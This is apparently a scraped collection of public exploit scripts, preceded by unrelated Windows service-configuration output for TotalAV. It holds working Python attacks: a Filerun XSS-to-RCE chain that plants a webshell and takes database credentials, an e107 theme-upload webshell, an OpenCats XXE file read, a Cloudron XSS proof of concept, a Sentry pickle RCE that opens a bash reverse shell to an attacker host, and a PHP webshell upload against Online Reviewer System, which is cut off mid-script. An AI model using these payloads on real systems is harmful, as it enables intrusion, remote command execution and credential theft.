Anti-Malware SDK Protected Service         AMSProtectedService      C:\Program Files (x86)\TotalAV\savapi\elam_ppl\amsprotectedservice.exe    Auto

C:\Users\user>sc qc SecurityService
[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: SecurityService
        TIPO                      : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO                : 2   AUTO_START
        CONTROLLO_ERRORE          : 1   NORMAL
        NOME_PERCORSO_BINARIO     : C:\Program Files(x86)\TotalAV\SecurityService.exe
        GRUPPO_ORDINE_CARICAMENTO :
        TAG                       : 0
        NOME_VISUALIZZATO         : PC Security Management Service
        DIPENDENZE                :
        SERVICE_START_NAME        : LocalSystem

C:\Users\user>sc qc SecurityServiceMonitor
[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: SecurityServiceMonitor
        TIPO                      : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO                : 2   AUTO_START
        CONTROLLO_ERRORE          : 1   NORMAL
        NOME_PERCORSO_BINARIO     : C:\Program Files(x86)\TotalAV\SecurityService.exe --monitor
        GRUPPO_ORDINE_CARICAMENTO :
        TAG                       : 0
        NOME_VISUALIZZATO         : PC Security Management Monitoring Service
        DIPENDENZE                :
        SERVICE_START_NAME        : LocalSystem

C:\Users\user>sc qc AMSProtectedService
[SC] QueryServiceConfig OPERAZIONI RIUSCITE

NOME_SERVIZIO: AMSProtectedService
        TIPO                      : 10  WIN32_OWN_PROCESS
        TIPO_AVVIO                : 2   AUTO_START
        CONTROLLO_ERRORE          : 1   NORMAL
        NOME_PERCORSO_BINARIO     : C:\Program Files (x86)\TotalAV\savapi\elam_ppl\amsprotectedservice.exe
        GRUPPO_ORDINE_CARICAMENTO :
        TAG                       : 0
        NOME_VISUALIZZATO         : Anti-Malware SDK Protected Service
        DIPENDENZE                :
        SERVICE_START_NAME        : LocalSystem
7. # Exploit Title: Filerun 2021.03.26 - Remote Code Execution (RCE) (Authenticated)
# Date: 09/21/2021
# Exploit Author: syntegris information solutions GmbH
# Credits: Christian P.
# Vendor Homepage: https://filerun.com
# Software Link: https://f.afian.se/wl/?id=SkPwYC8dOcMIDWohmyjOqAgdqhRqCZ3X&fmode=download&recipient=d3d3LmZpbGVydW4uY29t
# Version: 2021.03.26
# Tested on: official docker image

# PoC for exploiting a chain of a stored XSS and authenticated Remote Code Execution

import requests
import time
import sys

# this is the plain version of the payload below
"""
var xmlhttp = new XMLHttpRequest();
var url = '/?module=cpanel&section=settings&page=image_preview&action=checkImageMagick'
var payload = "echo '<?php echo shell_exec($_REQUEST[\'cmd\']); ?>' > shell.php #";

xmlhttp.onreadystatechange = function() {
    if (xmlhttp.readyState == XMLHttpRequest.DONE) {
        if (xmlhttp.status == 200) {
            console.log(xmlhttp.responseText);
        }
    }
};

xmlhttp.open("POST", url, true);
xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xmlhttp.send("mode=exec&path=convert|"+payload);
"""

if not len(sys.argv) == 2:
    print("missing target url")
    sys.exit(1)

target = sys.argv[1]


def inject_code():
    # HTML-entity encoded form of the JavaScript above; the literal double quotes
    # inside it require a triple-quoted delimiter, and the pieces are joined by
    # implicit string concatenation
    payload = ("""&#x76;&#x61;&#x72;&#x20;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x20;&#x3d;&#x20;&#x6e;&#x65;&#x77;&#x20;&#x58;&#x4d;&#x4c;&#x48;&#x74;&#x74;&#x70;&#x52;&#x65;&#x71;&#x75;&#x65;&#x73;&#x74;&#x28;&#x29;&#x3b;&#x0a;&#x76;&#x61;&#x72;&#x20;&#x75;&#x72;&#x6c;&#x20;&#x3d;&#x20;&#x27;&#x2f;&#x3f;&#x6d;&#x6f;&#x64;&#x75;&#x6c;&#x65;&#x3d;&#x63;&#x70;&#x61;&#x6e;&#x65;&#x6c;&&#x73;&#x65;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x3d;&#x73;&#x65;&#x74;&#x74;&#x69;&#x6e;&#x67;&#x73;&&#x70;&#x61;&#x67;&#x65;&#x3d;&#x69;&#x6d;&#x61;&#x67;&#x65;&#x5f;&#x70;&#x72;&#x65;&#x76;&#x69;&#x65;&#x77;&&#x61;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x3d;&#x63;&#x68;&#x65;&#x63;&#x6b;&#x49;&#x6d;&#x61;&#x67;&#x65;&#x4d;&#x61;&#x67;&#x69;&#x63;&#x6b;&#x27;&#x0a;&#x76;&#x61;&#x72;&#x20;&#x70;&#x61;&#x79;&#x6c;&#x6f;&#x61;&#x64;&#x20;&#x3d;&#x20;"&#x65;&#x63;&#x68;&#x6f;&#x20;&#x27;<&#x3f;&#x70;&#x68;&#x70;&#x20;&#x65;&#x63;&#x68;&#x6f;&#x20;&#x73;&#x68;&#x65;&#x6c;&#x6c;&#x5f;&#x65;&#x78;&#x65;&#x63;&#x28;&#x24;&#x5f;&#x52;&#x45;&#x51;&#x55;&#x45;&#x53;&#x54;&#x5b;&#x5c;&#x27;&#x63;&#x6d;&#x64;&#x5c;&#x27;&#x5d;&#x29;&#x3b;&#x20;&#x3f;>&#x27;&#x20;&#x20;>&#x20;&#x73;&#x68;&#x65;&#x6c;&#x6c;&#x2e;&#x70;&#x68;&#x70;&#x20;&#x23;"&#x3b;&#x0a;&#x0a;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x6f;&#x6e;&#x72;&#x65;&#x61;&#x64;&#x79;&#x73;&#x74;&#x61;&#x74;&#x65;&#x63;&#x68;&#x61;&#x6e;&#x67;&#x65;&#x20;&#x3d;&#x20;&#x66;&#x75;&#x6e;&#x63;&#x74;&#x69;&#x6f;&#x6e;&#x28;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x69;&#x66;&#x20;&#x28;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x72;&#x65;&#x61;&#x64;&#x79;&#x53;&#x74;&#x61;&#x74;&#x65;&#x20;&#x3d;&#x3d;&#x20;&#x58;&#x4d;&#x4c;&#x48;&#x74;&#x74;&#x70;&#x52;&#x65;&#x71;&#x75;&#x65;&#x73;&#x74;&#x2e;&#x44;&#x4f;&#x4e;&#x45;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x69;&#x66;&#x20;&#x28;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x20;&#x3d;&#x3d;&#x20;&#x32;&#x30;&#x30;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x09;&#x20;&#x20;&#x20"""
               """;&#x63;&#x6f;&#x6e;&#x73;&#x6f;&#x6c;&#x65;&#x2e;&#x6c;&#x6f;&#x67;&#x28;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x72;&#x65;&#x73;&#x70;&#x6f;&#x6e;&#x73;&#x65;&#x54;&#x65;&#x78;&#x74;&#x29;&#x3b;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x7d;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x65;&#x6c;&#x73;&#x65;&#x20;&#x69;&#x66;&#x20;&#x28;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x73;&#x74;&#x61;&#x74;&#x75;&#x73;&#x20;&#x3d;&#x3d;&#x20;&#x34;&#x30;&#x30;&#x29;&#x20;&#x7b;&#x0a;&#x09;&#x09;&#x20;&#x20;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x54;&#x68;&#x65;&#x72;&#x65;&#x20;&#x77;&#x61;&#x73;&#x20;&#x61;&#x6e;&#x20;&#x65;&#x72;&#x72;&#x6f;&#x72;&#x20;&#x34;&#x30;&#x30;&#x27;&#x29;&#x3b;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x7d;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x65;&#x6c;&#x73;&#x65;&#x20;&#x7b;&#x0a;&#x09;&#x09;&#x20;&#x20;&#x20;&#x61;&#x6c;&#x65;&#x72;&#x74;&#x28;&#x27;&#x73;&#x6f;&#x6d;&#x65;&#x74;&#x68;&#x69;&#x6e;&#x67;&#x20;&#x65;&#x6c;&#x73;&#x65;&#x20;&#x6f;&#x74;&#x68;&#x65;&#x72;&#x20;&#x74;&#x68;&#x61;&#x6e;&#x20;&#x32;&#x30;&#x30;&#x20;&#x77;&#x61;&#x73;&#x20;&#x72;&#x65;&#x74;&#x75;&#x72;&#x6e;&#x65;&#x64;&#x27;&#x29;&#x3b;&#x0a;&#x09;&#x20;&#x20;&#x20;&#x7d;&#x0a;&#x09;&#x7d;&#x0a;&#x7d;&#x3b;&#x0a;&#x0a;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x6f;&#x70;&#x65;&#x6e;&#x28;"&#x50;&#x4f;&#x53;&#x54;"&#x2c;&#x20;&#x75;&#x72;&#x6c;&#x2c;&#x20;&#x74;&#x72;&#x75;&#x65;&#x29;&#x3b;&#x0a;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x73;&#x65;&#x74;&#x52;&#x65;&#x71;&#x75;&#x65;&#x73;&#x74;&#x48;&#x65;&#x61;&#x64;&#x65;&#x72;&#x28;"&#x43;&#x6f;&#x6e;&#x74;&#x65;&#x6e;&#x74;&#x2d;&#x54;&#x79;&#x70;&#x65;"&#x2c;&#x20;"&#x61;&#x70;&#x70;&#x6c;&#x69;&#x63;&#x61;&#x74;&#x69;&#x6f;&#x6e;&#x2f;&#x78;&#x2d;&#x77;&#x77;&#x77;&#x2d;&#x66;&#x6f;&#x72;&#x6d;&#x2d;&#x75;&#x72;&#x6c;&#x65;&#x6e;&#x63;&#x6f;&#x64;&#x65;&#x64;"&#x29;&#x3b;&#x0a;&#x78;&#x6d;&#x6c;&#x68;&#x74;&#x74;&#x70;&#x2e;&#x73;&#x65;&#x6e;&#x64;&#x28;"&#x6d;&#x6f;&#x64;&#x65;&#x3d;&#x65;&#x78;&#x65;&#x63;"""
               """&&#x70;&#x61;&#x74;&#x68;&#x3d;&#x63;&#x6f;&#x6e;&#x76;&#x65;&#x72;&#x74;&#x7c;"&#x2b;&#x70;&#x61;&#x79;&#x6c;&#x6f;&#x61;&#x64;&#x29;&#x3b;&#x0a;""")
    req = requests.post(
        "%s/?module=fileman&page=login&action=login" % target,
        data={'username': 'nonexistend', 'password': 'wrong', 'otp': '', 'two_step_secret': '', 'language': ''},
        headers={'X-Forwarded-For': '<img src="/asdasdasd" onerror=%s >' % payload}
    )


def check_shell_exists():
    req = requests.get("%s/shell.php" % target)
    if req.status_code != 200:
        return False
    return True


def process_command(command):
    req = requests.get("%s/shell.php?cmd=%s" % (target, command))
    print(req.text)


while True:
    print("Injecting new log message...")
    inject_code()
    time.sleep(10)
    if check_shell_exists():
        print("Shell exists under '%s/shell.php?cmd=ls'" % target)
        break

print("Lets get autoconfig.php which contains database credentials...")
process_command("cp system/data/autoconfig.php js/autoconfig.txt")
ac_resp = requests.get("%s/js/autoconfig.txt" % target)
with open("filerun.autoconfig.php", "wb") as ac_f:
    ac_f.write(ac_resp.content)
process_command("rm js/autoconfig.php")

while True:
    command = input("Command:")
    process_command(command)
8. # Exploit Title: e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 21-09-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://e107.org/
# Software Link: https://e107.org/download
# Version: 2.3.0
# Category: Webapps
# Tested on: Linux/Windows

# e107 is a free website content management system
# Includes an endpoint that allows remote access
# Theme page is misconfigured, causing security vulnerability
# User information with sufficient permissions is required.
# The contents of the upload "malicious.zip" file must be too long to read to bypass some security measures!

# Example: python3 exploit.py -u http://example.com -l admin -p Admin123
# python3 exploit.py -h

from time import sleep
import requests
import argparse


def main():
    parser = argparse.ArgumentParser(
        description='e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)'
    )
    parser.add_argument('-u', '--host', type=str, required=True)
    parser.add_argument('-l', '--login', type=str, required=True)
    parser.add_argument('-p', '--password', type=str, required=True)
    args = parser.parse_args()

    print("\ne107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)",
          "\nExploit Author: Halit AKAYDIN (hLtAkydn)\n")
    host(args)


def host(args):
    # Check http or https
    if args.host.startswith(('http://', 'https://')):
        print("[?] Check Url...\n")
        sleep(2)
        args.host = args.host
        if args.host.endswith('/'):
            args.host = args.host[:-1]
        else:
            pass
    else:
        print("\n[?] Check Adress...\n")
        sleep(2)
        args.host = "http://" + args.host
        args.host = args.host
        if args.host.endswith('/'):
            args.host = args.host[:-1]
        else:
            pass

    # Check Host Status
    try:
        response = requests.get(args.host)
        if response.status_code != 200:
            print("[-] Address not reachable!")
            sleep(2)
            exit(1)
        else:
            check(args)
    except requests.ConnectionError as exception:
        print("[-] Address not reachable!")
        sleep(2)
        exit(1)


def check(args):
    response = requests.get(args.host + "/e107_themes/payload/payload.php?cmd=whoami")
    if response.status_code == 200:
        print("[*] Exploit File Exists!\n")
        sleep(2)
        exploit(args)
    else:
        login(args)


def login(args):
    url = args.host + "/e107_admin/admin.php"
    headers = {
        "Cache-Control": "max-age=0",
        "Upgrade-Insecure-Requests": "1",
        "Origin": args.host,
        "Content-Type": "application/x-www-form-urlencoded",
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Referer": args.host + "/e107_admin/admin.php",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "en-US,en;q=0.9",
        "Connection": "close"
    }
    data = {"authname": args.login, "authpass": args.password, "authsubmit": "Log In"}
    response = requests.post(url, headers=headers, data=data, allow_redirects=False)
    new_cookie = response.cookies.get("MySi_cookieSID")

    if (response.headers.get("Location") == "admin.php?failed"):
        print("[-] Login Failed...\n")
        print("Your username or password is incorrect.")
        sleep(2)
        exit(1)
    else:
        print("[+] Success Login...\n")
        sleep(2)
        install(args, new_cookie)


def install(args, new_cookie):
    url = args.host + "/e107_admin/theme.php"
    cookies = {"MySi_cookieSID": new_cookie, "e107_tzOffset": "-180"}
    headers = {
        "Cache-Control": "max-age=0",
        "Upgrade-Insecure-Requests": "1",
        "Origin": args.host,
        "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary",
        "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0",
        "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
        "Referer": args.host + "/e107_admin/theme.php?mode=main&action=upload",
        "Accept-Encoding": "gzip, deflate",
        "Accept-Language": "en-US,en;q=0.9",
        "Connection": "close"
    }
    # multipart body carrying the theme zip (payload/payload.php) as the original author built it
    data = "------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n\r\n2097152\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"ac\"\r\n\r\n005cd2159fa5342883b18a46726a908d\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"file_userfile[]\"; filename=\"payload.zip\"\r\nContent-Type: application/zip\r\n\r\nPK\x03\x04\x14\x03\x00\x00\x00\x00\xf9|5S\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00payload/PK\x03\x04\x14\x03\x00\x00\x08\x00\xc2\x845S\xb1\xa6\xeeb>\x00\x00\x00M\x00\x00\x00\x13\x00\x00\x00payload/payload.php\xb3\xb1/\xc8(P\xc8L\xd3\xc8,.N-\xd1P\x89ww\r\x89VO\xceMQ\x8f\xd5\xd4\xacVP\x01\xb2\x14l\x15P\xc5\xad\x15\x8a+\x8bKRs5@\xb2@^Jf\xaa\xb5B\xad\x82\xbd\x1d\x00PK\x01\x02?\x03\x14\x03\x00\x00\x00\x00\xf9|5S\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x08\x00$\x00\x00\x00\x00\x00\x00\x00\x10\x80\xedA\x00\x00\x00\x00payload/\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x00\xaf\x9b\xc4\xe5\xae\xd7\x01\x80E4\xc5\xe5\xae\xd7\x01\x00\xaf\x9b\xc4\xe5\xae\xd7\x01PK\x01\x02?\x03\x14\x03\x00\x00\x08\x00\xc2\x845S\xb1\xa6\xeeb>\x00\x00\x00M\x00\x00\x00\x13\x00$\x00\x00\x00\x00\x00\x00\x00 \x80\xa4\x81&\x00\x00\x00payload/payload.php\n\x00 \x00\x00\x00\x00\x00\x01\x00\x18\x00\x80/\x99\xe6\xed\xae\xd7\x01\x008\xa1x\xee\xae\xd7\x01\x80/\x99\xe6\xed\xae\xd7\x01PK\x05\x06\x00\x00\x00\x00\x02\x00\x02\x00\xbf\x00\x00\x00\x95\x00\x00\x00\x00\x00\r\n------WebKitFormBoundary\r\nContent-Disposition: form-data; name=\"upload\"\r\n\r\n1\r\n------WebKitFormBoundary--\r\n"
    response = requests.post(url, headers=headers, cookies=cookies, data=data, allow_redirects=False)

    if (response.status_code == 301):
        print("[!] Unauthorized user!\n\n")
        print("Requires user with add theme permissions.")
        sleep(2)
        exit(1)
    else:
        print("[!] Upload Vuln File!\n")
        sleep(2)
        exploit(args)


def exploit(args):
    print("[+] Exploit Done!\n")
    sleep(2)
    while True:
        cmd = input("$ ")
        url = args.host + "/e107_themes/payload/payload.php?cmd=" + cmd
        headers = {
            "Upgrade-Insecure-Requests": "1",
            "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
        }
        response = requests.post(url, headers=headers, timeout=5)
        if response.text == "":
            print(cmd + ": command not found\n")
        else:
            print(response.text)


if __name__ == '__main__':
    main()
9. # Exploit Title: OpenCats 0.9.4-2 - 'docx ' XML External Entity Injection (XXE)
# Date: 2021-09-20
# Exploit Author: Jake Ruston
# Vendor Homepage: https://opencats.org
# Software Link: https://github.com/opencats/OpenCATS/releases/download/0.9.4-2/opencats-0.9.4-2-full.zip
# Version: < 0.9.4-3
# Tested on: Linux
# CVE: 2019-13358

from argparse import ArgumentParser
from docx import Document
from zipfile import ZipFile
from base64 import b64decode
import requests
import re

# word/document.xml replacement: the external entity resolves to the requested file,
# base64-encoded via php://filter, and lands between the START/END markers
xml = """
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE root [<!ENTITY file SYSTEM 'php://filter/convert.base64-encode/resource={}'>]>
<w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" mc:Ignorable="w14 wp14">
<w:body>
<w:p>
<w:r>
<w:t>START&file;END</w:t>
</w:r>
</w:p>
<w:sectPr w:rsidR="00FC693F" w:rsidRPr="0006063C" w:rsidSect="00034616">
<w:pgSz w:w="12240" w:h="15840"/>
<w:pgMar w:top="1440" w:right="1800" w:bottom="1440" w:left="1800" w:header="720" w:footer="720" w:gutter="0"/>
<w:cols w:space="720"/>
<w:docGrid w:linePitch="360"/>
</w:sectPr>
</w:body>
</w:document>
"""


class CVE_2019_13358:
    def __init__(self):
        self.args = self.parse_arguments()

    def parse_arguments(self):
        parser = ArgumentParser()
        required = parser.add_argument_group("required arguments")
        required.add_argument("--url", help="the URL where OpenCATS is hosted", required=True)
        required.add_argument("--file", help="the remote file to read", required=True)
        args = parser.parse_args()

        if not args.url.startswith("http"):
            args.url = f"http://{args.url}"
        args.url = f"{args.url}/careers/index.php"
        return args

    def create_resume(self):
        document = Document()
        document.add_paragraph()
        document.save("resume.docx")

    def update_resume(self):
        with ZipFile("resume.docx", "r") as resume:
            resume.extractall()

        with open("word/document.xml", "w") as document:
            document.write(xml.format(self.args.file).strip())

        with ZipFile("resume.docx", "w") as resume:
            resume.write("word/document.xml")

    def get(self):
        params = {"m": "careers", "p": "showAll"}
        try:
            request = requests.get(self.args.url, params=params)
        except Exception as e:
            raise Exception("Failed to GET to the URL provided", e)

        id = re.search(r"ID=([0-9])*", request.text)
        if id is None:
            raise Exception("No vacancies were found")
        return id.group(1)

    def post(self, id):
        params = {"m": "careers", "p": "onApplyToJobOrder"}
        files = {
            "ID": (None, id),
            "candidateID": (None, -1),
            "applyToJobSubAction": (None, "resumeLoad"),
            "file": (None, ""),
            "resumeFile": open("resume.docx", "rb"),
            "resumeContents": (None, ""),
            "firstName": (None, ""),
            "lastName": (None, ""),
            "email": (None, ""),
            "emailconfirm": (None, ""),
            "phoneHome": (None, ""),
            "phoneCell": (None, ""),
            "phone": (None, ""),
            "bestTimeToCall": (None, ""),
            "address": (None, ""),
            "city": (None, ""),
            "state": (None, ""),
            "zip": (None, ""),
            "keySkills": (None, "")
        }
        try:
            request = requests.post(self.args.url, params=params, files=files)
        except Exception as e:
            raise Exception("Failed to POST to the URL provided", e)

        start = request.text.find("START")
        end = request.text.find("END")
        file = request.text[start + 5:end].strip()

        try:
            file = b64decode(file)
            file = file.decode("ascii").strip()
        except:
            raise Exception("File not found")

        print(file)

    def run(self):
        self.create_resume()
        self.update_resume()
        id = self.get()
        self.post(id)


CVE_2019_13358().run()
10. # Exploit Title: Cloudron 6.2 - 'returnTo ' Cross Site Scripting (Reflected)
# Date: 10.06.2021
# Exploit Author: Akıner Kısa
# Vendor Homepage: https://cloudron.io
# Software Link: https://www.cloudron.io/get.html
# Version: 6.3 >
# CVE : CVE-2021-40868

Proof of Concept:

1. Go to https://localhost/login.html?returnTo=
2. Type your payload after returnTo=
3. Fill in the login information and press the sign in button.
11. # Exploit Title: Sentry 8.2.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 22/09/2021
# Exploit Author: Mohin Paramasivam (Shad0wQu35t)
# Vulnerability Discovered By : Clement Berthaux (SYNACKTIV)
# Software Link: https://sentry.io/welcome/
# Advisory: https://doc.lagout.org/Others/synacktiv_advisory_sentry_pickle.pdf
# Tested on: Sentry 8.0.0
# Fixed Versions : 8.1.4 , 8.2.2
# NOTE : Only exploitable by a user with Superuser privileges.
# Example Usage : https://imgur.com/a/4w5rH5s

# Python 2 script (uses cPickle)

import requests
import re
import warnings
from bs4 import BeautifulSoup
import sys
import base64
import urllib
import argparse
import os
import time
from cPickle import dumps
import subprocess
from base64 import b64encode
from zlib import compress
from shlex import split
from datetime import datetime

parser = argparse.ArgumentParser(description='Sentry < 8.2.2 Authenticated RCE')
parser.add_argument('-U', help='Sentry Admin Username / Email')
parser.add_argument('-P', help='Sentry Admin Password')
parser.add_argument('-l', help='Rev Shell LHOST')
parser.add_argument('-p', help='Rev Shell LPORT ', type=int)
parser.add_argument('--url', help='Sentry Login URL ')
args = parser.parse_args()

username = args.U
password = args.P
lhost = args.l
lport = args.p
sentry_url = args.url


# Generate Payload
class PickleExploit(object):
    def __init__(self, command_line):
        self.args = split(command_line)

    def __reduce__(self):
        return (subprocess.Popen, (self.args,))


rev_shell = '/bin/bash -c "bash -i >& /dev/tcp/%s/%s 0>&1"' % (lhost, lport)
payload = b64encode(compress(dumps(PickleExploit(rev_shell))))

print("\r\n[+] Using Bash Reverse Shell : %s" % (rev_shell))
print("[+] Encoded Payload : %s" % (payload))

# Perform Exploitation
warnings.filterwarnings("ignore", category=UserWarning, module='bs4')
request = requests.Session()

print("[+] Retrieving CSRF token to submit the login form")
print("[+] URL : %s" % (sentry_url))
time.sleep(1)
page = request.get(sentry_url)
html_content = page.text
soup = BeautifulSoup(html_content, features="lxml")
token = soup.findAll('input')[0].get("value")
print("[+] CSRF Token : " + token)
time.sleep(1)

#Login
proxies = {
    "http": "http://127.0.0.1:8080",
    "https": "https://127.0.0.1:8080",
}

login_info = {
    "csrfmiddlewaretoken": token,
    "op": "login",
    "username": username,
    "password": password
}

login_request = request.post(sentry_url, login_info)

if login_request.status_code == 200:
    print("[+] Login Successful")
    time.sleep(1)
else:
    print("Login Failed")
    print(" ")
    sys.exit()

#get admin page
split_url = sentry_url.split("/")[2:]
main_url = "http://" + split_url[0]
audit_url = main_url + "/admin/sentry/auditlogentry/add/"

#request auditpage
date = datetime.today().strftime('%Y-%m-%d')
time = datetime.today().strftime('%H:%M:%S')

exploit_fields = {
    "csrfmiddlewaretoken": request.cookies['csrf'],
    "organization": "1",
    "actor_label": "root@localhost",
    "actor": "1",
    "actor_key": " ",
    "target_object": "2",
    "target_user": " ",
    "event": "31",
    "ip_address": "127.0.0.1",
    "data": payload,
    "datetime_0": date,
    "datetime_1": time,
    "initial-datetime_0": date,
    "initial-datetime_1": time,
    "_save": "Save"
}

print("[+] W00t W00t Sending Shell :) !!!")
stager = request.post(audit_url, exploit_fields)

if stager.status_code == 200:
    print("[+] Check nc listener!")
else:
    print("Something Went Wrong or Not Vulnerable :(")
12. # Exploit Title: Online Reviewer System 1.0 - Remote Code Execution (RCE) (Unauthenticated)
# Exploit Author: Abdullah Khawaja
# Date: 2021-09-21
# Vendor Homepage: https://www.sourcecodester.com/php/12937/online-reviewer-system-using-phppdo.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/reviewer_0.zip
# Version: 1.0
# Tested On: Kali Linux, Windows 10 + XAMPP 7.4.4
# Description: Online Reviewer System 1.0 suffers from an Unauthenticated File Upload Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) on the Hosting Webserver via uploading a maliciously crafted PHP file that bypasses the image upload filters.

# RCE via executing exploit:
# Step 1: run the exploit in python with this command: python3 ORS_v1.0.py
# Step 2: Input the URL of the vulnerable application: Example: http://localhost/reviewer/

import requests, sys, urllib, re
import datetime
from colorama import Fore, Back, Style

requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)

header = Style.BRIGHT+Fore.RED+' '+Fore.RED+' Abdullah '+Fore.RED+'"'+Fore.RED+'hax.3xploit'+Fore.RED+'"'+Fore.RED+' Khawaja\n'+Style.RESET_ALL
print(Style.BRIGHT+" Online Reviewer System 1.0")
print(Style.BRIGHT+" Unauthenticated Remote Code Execution"+Style.RESET_ALL)
print(header)
# banner art (line breaks lost in the original post)
print(r""" ______ _______ ________ ___ //_/__ /_______ ___ _______ ______(_)_____ _ __ ,< __ __ \ __ `/_ | /| / / __ `/____ /_ __ `/ _ /| | _ / / / /_/ /__ |/ |/ // /_/ /____ / / /_/ / /_/ |_| /_/ /_/\__,_/ ____/|__/ \__,_/ ___ / \__,_/ /___/ abdullahkhawaja.com """)

GREEN = '\033[32m'  # Green Text
RED = '\033[31m'  # Red Text
RESET = '\033[m'  # reset to the defaults

# proxies = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080'}

#Create a new session
s = requests.Session()

#Set Cookie
cookies = {'PHPSESSID': 'd794ba06fcba883d6e9aaf6e528b0733'}

LINK = input("Enter URL of The Vulnerable Application : ")


def webshell(LINK, session):
    try:
        WEB_SHELL = LINK+'/system/system/admins/assessments/databank/files/'+filename
        getdir = {'cmd': 'echo %CD%'}
        r2 = session.get(WEB_SHELL, params=getdir, verify=False)
        status = r2.status_code
        if status != 200:
            print(Style.BRIGHT+Fore.RED+"[!] "+Fore.RESET+"Could not connect to the webshell."+Style.RESET_ALL)
            r2.raise_for_status()
        print(Fore.GREEN+'[+] '+Fore.RESET+'Successfully connected to webshell.')
        cwd = re.findall('[CDEF].*', r2.text)
        cwd = cwd[0]+"> "
        term = Style.BRIGHT+Fore.GREEN+cwd+Fore.RESET
        while True:
            thought = input(term)
            command = {'cmd': thought}
            r2 = requests.get(WEB_SHELL, params=command, verify=False)
            status = r2.status_code
            if status != 200:
                r2.raise_for_status()
            response2 = r2.text
            print(response2)
    except:
        print("\r\nExiting.")
        sys.exit(-1)


#Creating a PHP Web Shell
phpshell = {
    'personImage': (
        'kh4waja.php',
        '<?php echo shell_exec($_REQUEST["cmd"]); ?>',
        'application/octet-stream',
        {'Content-Disposition': 'form-data'}
    )
}

# Defining value for form data
data = {
    'difficulty_id': '1',
    'test_desc': 'CIVIL ENGINEERING',
    'test_desc': 'CIVIL ENGINEERING',
    'test_subject': 'Mathematics, Surveying and Transportation Engineering',
    'description': 'Hello World',
    'option_a': 'a',
    'option_b': 'b',
    'option_c': 'c',
    'option_d': 'd',
    'answer': 'A',
    'btnAddQuestion': 'Save'
}
filename = 'kh4waja.php'

#Uploading Reverse Shell
print("[*]Uploading PHP Shell For RCE...")
